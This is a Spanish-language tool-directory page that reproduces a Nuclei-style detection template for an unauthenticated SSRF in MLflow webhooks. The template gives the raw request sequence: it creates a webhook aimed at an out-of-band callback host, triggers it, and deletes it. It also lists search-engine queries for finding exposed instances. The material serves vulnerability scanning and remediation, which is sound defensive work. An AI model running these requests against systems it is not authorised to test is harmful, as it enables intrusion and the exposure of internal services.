Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-64849.yaml — Detecta el SSRF no autenticado en webhooks de MLflow (CVE-2026-64849) que accede a servicios de metadatos internos o en la nube y filtra los detalles de la respuesta eludiendo la redirección. | Kitploit
Herramientas/GitHubGitHub/zavisco/cve-2026-64849.yaml
Escáneres de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Seguridad de APIsRecopilación de InformaciónSeguridad en la Nube
GitHubzavisco/cve-2026-64849.yaml

CVE-2026-64849.yaml

Detecta el SSRF no autenticado en webhooks de MLflow (CVE-2026-64849) que accede a servicios de metadatos internos o en la nube y filtra los detalles de la respuesta eludiendo la redirección.

Ver Repositorio
hace 1 díaAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

id: CVE-2026-64849

info: name: MLflow Webhook SSRF - Lectura completa no autenticada mediante bypass de redirección author: DhiyaneshDk severity: critical description: | MLflow > 3.15.0 contiene una vulnerabilidad de divulgación de información causada por una validación incorrecta de las URL de los webhooks, lo que permite a los atacantes alcanzar servicios internos o de metadatos en la nube y obtener detalles de la respuesta. La explotación requiere acceso no autenticado al endpoint de prueba del webhook. impact: | Los atacantes pueden acceder a servicios internos o de metadatos en la nube y recuperar el estado y el cuerpo de la respuesta, exponiendo potencialmente información sensible. remediation: | Actualice MLflow a una versión que contenga el PR #24258, que añade SSRFProtectedHTTPAdapter para la validación de IP en el momento de la conexión, cubriendo los destinos de redirección y el DNS rebinding. reference: - https://github.com/mlflow/mlflow/security/advisories/GHSA-7gwp-5pfp-969j - https://github.com/mlflow/mlflow/pull/24258 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cve-id: CVE-2026-64849 epss-score: 0.00349 epss-percentile: 0.27929 cwe-id: CWE-918 metadata: max-request: 3 verified: true shodan-query: http.title:"MLflow" fofa-query: title="MLflow" tags: cve,cve2026,mlflow,ssrf,oast,webhook,oss,vkev

variables: random: "{{rand_text_alpha(8)}}"

http:

  • raw:

    • | POST /api/2.0/mlflow/webhooks HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"name":"{{random}}","url":"https://{{interactsh-url}}","events":[{"entity":"REGISTERED_MODEL","action":"CREATED"}]}

    • | POST /api/2.0/mlflow/webhooks/{{webhook_id}}/test HTTP/1.1 Host: {{Hostname}} Content-Type: application/json

      {"webhook_id":"{{webhook_id}}","event":{"entity":"REGISTERED_MODEL","action":"CREATED"}}

    • | DELETE /api/2.0/mlflow/webhooks/{{webhook_id}} HTTP/1.1 Host: {{Hostname}}

    matchers-condition: and matchers:

    • type: word part: body_1 words:

      • "webhook_id"
      • "ACTIVE" condition: and
    • type: word part: interactsh_protocol words:

      • "http"

    extractors:

    • type: regex name: webhook_id part: body internal: true regex:
      • '"webhook_id":\s*"([^"]+)"' group: 1

digest: 490a0046304402202e79c8a66a1a62e91bddc38dcebe402ecee4ff7036a36448e522f5bd64c13a8702203f2da52bd9424be56645e2866f623392ae4455c8d8c68549ab3d368fb7ff91c2:922c64590222798bb761d5b6d8e72950

Descargar herramienta